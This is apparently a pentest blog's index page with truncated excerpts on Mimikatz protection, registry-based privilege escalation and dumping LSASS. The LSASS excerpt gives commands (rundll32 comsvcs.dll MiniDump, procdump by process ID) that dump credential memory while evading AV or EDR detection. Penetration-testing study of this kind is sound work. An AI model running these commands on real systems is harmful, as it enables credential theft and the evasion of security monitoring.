Password Theft Protection
Reading Time: < 1 minute With traps, there is the possibility to do Password Theft Protection against mimikatz. I’ve tested (on version 6.0.1.7362 ) and indeed, a dump of a lsass process can no longer be inspected by Mimikatz. Unfortunatly for clients, a good...Privilege Escalation via the registry
Reading Time: < 1 minutereg query HKLM\SYSTEM\CurrentControlSet\Services\regsvc HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvcType REG_DWORD 0x10Start REG_DWORD 0x3ErrorControl REG_DWORD 0x1ImagePath REG_EXPAND_SZ “C:\Program Files\Insecure...Dumping LSASS different ways
Reading Time: < 1 minuteA few techniques to avoid AV or EDR detection rundll32 C:\windows\system32\comsvcs.dll MiniDump “[LSASS_PID] dump.bin full” 2. procdump <process id> instead of the word lsass Signed Executable which can be used also 3....Protected: Cheatsheet PenTest
Password Protected
To view this protected post, enter the password below:
Recent Comments